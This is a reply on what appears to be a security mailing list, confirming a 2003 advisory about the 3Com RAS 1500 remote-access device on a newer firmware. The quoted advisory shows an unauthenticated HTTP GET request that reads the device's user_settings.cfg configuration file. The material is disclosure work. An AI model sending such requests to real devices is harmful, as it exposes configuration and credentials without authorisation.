re:3com RAS 1500 Remote vulnerabilities.

[Jan Kachlik <jkachlik () isgroup com>]

Hi Piotr Chytla

> Synopsis:   3com RAS 1500 Remote vulnerabilities.
> Product:    3C433279A-US http://www.3com/ras1500
> Version:    Firmware X2.0.10
>
> URL:        http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
> Author:     Piotr Chytla <pch () isec pl>
> Date:       February 27, 2003

I tested second bug on

SuperStack II Remote Access System 1500, Version: 2.5.0, 159,

and working...

> Issue:
> - ------
>
> 3com SuperStack II Remote Access System 1500 is telco device which
> provides access via BRI-ISDN/Analog to dialin users.
> It contains two remote vulnerabilities, first is Denial Of Service that
> leads to system crash, second can be used to read configuration files.

> 2. Configuration file read
>
> Unauthorized user can read configuration and system files, using web
> interface on RAS 1500 .
>
>    GET /download.htm HTTP/1.0
>    HTTP/1.0 401 Unauthorized
>    WWW-Authenticate: Basic realm="RAS1500"
>    Content-Type: text/html
>    Server: Allegro-Software-RomPager/2.10
>
>    GET /user_settings.cfg HTTP/1.0
>    HTTP/1.0 200 OK
>    Content-Type: multipart
>    Date: Mon, 25 May 1998 00:26:38 GMT
>    Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
>    Content-Length: 1258
>    Server: Allegro-Software-RomPager/2.10
>    [..]
    
    content of user_setting.cfg


-- 
 Best regards,
  Jan Kachlik
  jkachlik () isgroup com
 
 +---------------------------------+
 ' Kachlik Jan                     '
 ' Security & Network Specialist   '
 ' InterSource Solutions Group     '
 ' Mathonova 25, 613 00 Brno CZ    '
 ' Mail: jkachlik () isgroup com      '
 ' Mail: jkachlik () hacktrack com    '
 ' GSM:  +420.728.662.807          '
 ' ICQ:  #56618470                 '
 ' WebSite: http://www.isgroup.com '
 +---------------------------------+